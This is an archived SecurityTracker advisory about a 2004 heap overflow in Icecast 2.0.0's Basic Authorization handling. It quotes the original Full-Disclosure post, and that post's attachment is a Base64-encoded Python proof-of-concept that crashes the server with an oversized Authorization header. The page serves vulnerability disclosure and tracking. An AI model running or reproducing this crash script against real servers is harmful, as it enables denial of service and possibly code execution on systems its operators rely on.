SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   Icecast Vendors:   Icecast.org
icecast Heap Overflow in Processing Basic Authentication Lets Remote Users Crash the Service
SecurityTracker Alert ID:  1010101
SecurityTracker URL:  http://securitytracker.com/id/1010101
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 10 2004
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.0.0
Description:   A heap overflow vulnerability was reported in icecast. A remote user can cause the icecast service to crash and may be able to execute arbitrary code on the target system [but code execution was not confirmed in the report].

ned reported that the flaw resides in the processing of Base64 HTTP Basic Authorization request. A remote user can send a specially crafted HTTP GET request to trigger the overflow and cause the target service to crash.

A demonstration exploit script is provided in the Source Message [it is Base64 encoded].

The vendor has reportedly been notified.

Impact:   A remote user can cause the target service to crash. A remote user may be able to execute arbitrary code [but that was not confirmed in the report].
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.icecast.org/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
May 19 2004 (Vendor Issues Fix) icecast Heap Overflow in Processing Basic Authentication Lets Remote Users Crash the Service
The vendor has issued a fix.
May 19 2004 (Gentoo Issues Fix) icecast Heap Overflow in Processing Basic Authentication Lets Remote Users Crash the Service
Gentoo has released a fix.



 Source Message Contents

Subject:  [Full-Disclosure] Icecast 2.0.0 preauth overflow


  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

--0-1325314640-1084107392=:6785
Content-Type: TEXT/PLAIN; charset=US-ASCII

There exists a remotely exploitable heap overflow in Icecast 2.0.0.
The bug exists in the handling of base64 Authorization request.
This bug was found in about 40 seconds during a HTTP audit of the web 
component of Icecast with the fuzzer SMUDGE 
(http://felinemenace.org/~nd/SMUDGE/)

People complained that the last Icecast bugs weren't preauth. This one is.
Attached is a simple python script to reproduce the bug on the Windows 
platform. Our tests confirmed that some tweaking will crash linux version 
although this was not verified by the Icecast team.

Vendor == notified.

On another note tis signifies the first release from the UBC.

thanks,
nd.


-- 
http://felinemenace.org/~nd

--0-1325314640-1084107392=:6785
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="CAKEICING.py"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.44.0405090556320.6785@scratch>
Content-Description: 
Content-Disposition: attachment; filename="CAKEICING.py"

IyB3aWxsIGNyYXNoIHdpbmRvd3MgSWNlQ2FzdCAyLjAuMA0KIyBmbUBmZWxp
bmVtZW5hY2Uub3JnLCAyMDA0DQoNCmltcG9ydCBzb2NrZXQNCg0KcmVxID0g
IkdFVCAvYWRtaW4vIEhUVFAvMS4wXHJcbiINCnJlcSArPSAiQ29ubmVjdGlv
bjogS2VlcC1BbGl2ZVxyXG4iDQpyZXEgKz0gIlVzZXItQWdlbnQ6IE1vemls
bGEvNC43NiBbZW5dIChYMTE7IFU7IExpbnV4IDIuNC4yLTIgaTY4Nilcclxu
Ig0KcmVxICs9ICJIb3N0OiAxNjkuMjU0LjE2NS4xMzI6ODAwMFxyXG4iDQpy
ZXEgKz0gIkFjY2VwdDogaW1hZ2UvZ2lmLCBpbWFnZS94LXhiaXRtYXAsIGlt
YWdlL2pwZWcsIGltYWdlL3BqcGVnLCBpbWFnZS9wbmcsICovKlxyXG4iDQpy
ZXEgKz0gIkFjY2VwdC1FbmNvZGluZzogZ3ppcFxyXG4iDQpyZXEgKz0gIkFj
Y2VwdC1MYW5ndWFnZTogZW5cclxuIg0KcmVxICs9ICJBY2NlcHQtQ2hhcnNl
dDogaXNvLTg4NTktMSwqLHV0Zi04XHJcbiINCnJlcSArPSAiQXV0aG9yaXph
dGlvbjogQmFzaWMgIiArICgiJTBhIiAqIDMwMDApDQpzID0gc29ja2V0LnNv
Y2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQpzLmNv
bm5lY3QoKCIxMjcuMC4wLjEiLDgwMDApKQ0Kcy5zZW5kKHJlcSkNCg==
--0-1325314640-1084107392=:6785--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC